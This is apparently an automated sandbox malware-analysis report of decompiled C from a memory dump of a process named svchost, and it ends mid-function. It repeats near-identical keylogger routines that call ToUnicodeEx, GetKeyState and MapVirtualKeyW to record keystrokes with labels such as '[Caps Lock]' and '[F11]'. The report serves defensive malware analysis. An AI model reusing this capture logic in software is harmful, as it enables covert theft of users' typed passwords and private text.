Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Insert], xrefs: 00C85C5A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8597D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8597D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Finish]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Finish], xrefs: 00C8597F

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A5A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A5A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Caps Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Caps Lock], xrefs: 00C85A5C

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B15(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F16]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F16], xrefs: 00C85B17

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85BBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BBF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F3]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F3], xrefs: 00C85BC1

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D68, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D68(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Right Ctrl]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Right Ctrl], xrefs: 00C85D6A
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85AC0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AC0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F11]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F11], xrefs: 00C85AC2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85CBE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CBE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Next Track]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
